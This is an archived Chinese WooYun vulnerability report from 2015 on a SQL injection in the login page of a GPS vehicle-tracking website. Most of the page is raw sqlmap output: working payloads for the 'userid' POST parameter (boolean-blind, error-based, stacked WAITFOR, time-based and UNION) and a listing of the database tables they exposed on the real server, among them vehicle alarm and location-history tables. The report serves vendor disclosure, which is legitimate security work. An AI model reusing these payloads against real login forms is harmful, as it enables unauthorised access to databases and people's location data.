乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-13: 细节已通知厂商并且等待厂商处理中 2015-03-13: 厂商已经确认,细节仅向厂商公开 2015-03-23: 细节向核心白帽子及相关领域专家公开 2015-04-02: 细节向普通白帽子公开 2015-04-12: 细节向实习白帽子公开 2015-04-27: 细节向公众公开
rt
与上一个ip不同
*****^心GPS车辆^*****1.http://**.**.**/
存在post注入Microsoft OLE DB Provider for SQL Server 错误 '80040e14'字符串 'admin'' 之前有未闭合的引号。/logina.asp,行 15
sqlmap identified the following injection points with a total of 61 HTTP(s) requests:---Parameter: userid (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: userid=admin' AND 7428=7428 AND 'BTOH'='BTOH&password=asd&I1.x=67&I1.y=12 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: userid=admin' AND 3479=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (3479=3479) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(118)+CHAR(113))) AND 'DEYu'='DEYu&password=asd&I1.x=67&I1.y=12 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: userid=admin';WAITFOR DELAY '0:0:5'--&password=asd&I1.x=67&I1.y=12 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: userid=admin' WAITFOR DELAY '0:0:5'--&password=asd&I1.x=67&I1.y=12 Type: UNION query Title: Generic UNION query (NULL) - 18 columns Payload: userid=-3410' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(88)+CHAR(111)+CHAR(81)+CHAR(107)+CHAR(77)+CHAR(118)+CHAR(65)+CHAR(74)+CHAR(114)+CHAR(88)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(118)+CHAR(113),NULL,NULL,NULL-- &password=asd&I1.x=67&I1.y=12---web server operating system: Windows 2003 or XPweb application technology: Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2000sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: userid (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: userid=admin' AND 7428=7428 AND 'BTOH'='BTOH&password=asd&I1.x=67&I1.y=12 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: userid=admin' AND 3479=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (3479=3479) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(118)+CHAR(113))) AND 'DEYu'='DEYu&password=asd&I1.x=67&I1.y=12 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: userid=admin';WAITFOR DELAY '0:0:5'--&password=asd&I1.x=67&I1.y=12 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: userid=admin' WAITFOR DELAY '0:0:5'--&password=asd&I1.x=67&I1.y=12 Type: UNION query Title: Generic UNION query (NULL) - 18 columns Payload: userid=-3410' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(88)+CHAR(111)+CHAR(81)+CHAR(107)+CHAR(77)+CHAR(118)+CHAR(65)+CHAR(74)+CHAR(114)+CHAR(88)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(118)+CHAR(113),NULL,NULL,NULL-- &password=asd&I1.x=67&I1.y=12---web server operating system: Windows 2003 or XPweb application technology: Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2000Database: tempdb[2 tables]+--------------------------------------------+| sysconstraints || syssegments |+--------------------------------------------+Database: msdb[82 tables]+--------------------------------------------+| RTblClassDefs || RTblDBMProps || RTblDBXProps || RTblDTMProps || RTblDTSProps || RTblDatabaseVersion || RTblEQMProps || RTblEnumerationDef || RTblEnumerationValueDef || RTblGENProps || RTblIfaceDefs || RTblIfaceHier || RTblIfaceMem || RTblMDSProps || RTblNamedObj || RTblOLPProps || RTblParameterDef || RTblPropDefs || RTblProps || RTblRelColDefs || RTblRelshipDefs || RTblRelshipProps || RTblRelships || RTblSIMProps || RTblScriptDefs || RTblSites || RTblSumInfo || RTblTFMProps || RTblTypeInfo || RTblTypeLibs || RTblUMLProps || RTblUMXProps || RTblVersionAdminInfo || RTblVersions || RTblWorkspaceItems || backupfile || backupmediafamily || backupmediaset || backupset || log_shipping_databases || log_shipping_monitor || log_shipping_plan_databases || log_shipping_plan_history || log_shipping_plans || log_shipping_primaries || log_shipping_secondaries || logmarkhistory || mswebtasks || restorefilegroup || restorefilegroup || restorehistory || sqlagent_info || sysalerts || syscachedcredentials || syscategories || sysconstraints || sysdbmaintplan_databases || sysdbmaintplan_history || sysdbmaintplan_jobs || sysdbmaintplans || sysdownloadlist || sysdtscategories || sysdtspackagelog || sysdtspackages || sysdtssteplog || sysdtstasklog || sysjobhistory || sysjobs_view || sysjobs_view || sysjobschedules || sysjobservers || sysjobsteps || sysnotifications || sysoperators || syssegments || systargetservergroupmembers || systargetservergroups || systargetservers_view || systargetservers_view || systaskids || systasks_view || systasks_view |+--------------------------------------------+Database: pubs[14 tables]+--------------------------------------------+| authors || discounts || employee || jobs || pub_info || publishers || roysched || sales || stores || sysconstraints || syssegments || titleauthor || titles || titleview |+--------------------------------------------+Database: gpslog[72 tables]+--------------------------------------------+| ALARMMSG200904 || ALARMMSG200905 || ALARMMSG200906 || ALARMMSG200907 || ALARMMSG201210 || ALARMMSG201211 || ALARMMSG201212 || ALARMMSG201301 || ALARMMSG201302 || ALARMMSG201303 || ALARMMSG201304 || ALARMMSG201305 || ALARMMSG201306 || ALARMMSG201307 || ALARMMSG201308 || ALARMMSG201309 || ALARMMSG201310 || ALARMMSG201311 || ALARMMSG201312 || ALARMMSG201401 || ALARMMSG201402 || ALARMMSG201403 || ALARMMSG201405 || ALARMMSG201406 || ALARMMSG201407 || ALARMMSG201408 || ALARMMSG201409 || ALARMMSG201410 || ALARMMSG201411 || ALARMMSG201412 || ALARMMSG201501 || ALARMMSG201502 || ALARMMSG201503 || ALARMMSG201504 || HISTORYINFO200904 || HISTORYINFO200905 || HISTORYINFO200906 || HISTORYINFO200907 || HISTORYINFO201210 || HISTORYINFO201211 || HISTORYINFO201212 || HISTORYINFO201301 || HISTORYINFO201302 || HISTORYINFO201303 || HISTORYINFO201304 || HISTORYINFO201305 || HISTORYINFO201306 || HISTORYINFO201307 || HISTORYINFO201308 || HISTORYINFO201309 || HISTORYINFO201310 || HISTORYINFO201311 || HISTORYINFO201312 || HISTORYINFO201401 || HISTORYINFO201402 || HISTORYINFO201403 || HISTORYINFO201405 || HISTORYINFO201406 || HISTORYINFO201407 || HISTORYINFO201408 || HISTORYINFO201409 || HISTORYINFO201410 || HISTORYINFO201411 || HISTORYINFO201412 || HISTORYINFO201501 || HISTORYINFO201502 || HISTORYINFO201503 || HISTORYINFO201504 || dtproperties || mt_info || sysconstraints || syssegments |+--------------------------------------------+Database: master[36 tables]+--------------------------------------------+| INFORMATION_SCHEMA.CHECK_CONSTRAINTS || INFORMATION_SCHEMA.COLUMNS || INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE || INFORMATION_SCHEMA.COLUMN_PRIVILEGES || INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE || INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE || INFORMATION_SCHEMA.DOMAINS || INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS || INFORMATION_SCHEMA.KEY_COLUMN_USAGE || INFORMATION_SCHEMA.PARAMETERS || INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS || INFORMATION_SCHEMA.ROUTINES || INFORMATION_SCHEMA.ROUTINE_COLUMNS || INFORMATION_SCHEMA.SCHEMATA || INFORMATION_SCHEMA.TABLES || INFORMATION_SCHEMA.TABLE_CONSTRAINTS || INFORMATION_SCHEMA.TABLE_PRIVILEGES || INFORMATION_SCHEMA.VIEWS || INFORMATION_SCHEMA.VIEW_COLUMN_USAGE || INFORMATION_SCHEMA.VIEW_TABLE_USAGE || MSreplication_options || spt_datatype_info_ext || spt_datatype_info_ext || spt_fallback_db || spt_fallback_dev || spt_fallback_usg || spt_monitor || spt_provider_types || spt_server_info || spt_values || sysconstraints || syslogins || sysoledbusers || sysopentapes || sysremotelogins || syssegments |+--------------------------------------------+Database: model[2 tables]+--------------------------------------------+| sysconstraints || syssegments |+--------------------------------------------+Database: Northwind[31 tables]+--------------------------------------------+| Categories || CustomerCustomerDemo || CustomerDemographics || Customers || EmployeeTerritories || Employees || Invoices || Region || Shippers || Suppliers || Territories || Alphabetical list of products || Category Sales for 1997 || Current Product List || Customer and Suppliers by City || Order Details Extended || Order Details Extended || Order Subtotals || Orders Qry || Orders Qry || Product Sales for 1997 || Products Above Average Price || Products Above Average Price || Products by Category || Quarterly Orders || Sales Totals by Amount || Sales by Category || Summary of Sales by Quarter || Summary of Sales by Year || sysconstraints || syssegments |+--------------------------------------------+
过滤
危害等级:高
漏洞Rank:10
确认时间:2015-03-13 15:30
验证确认存在所描述的问题,已通知其修复。
暂无
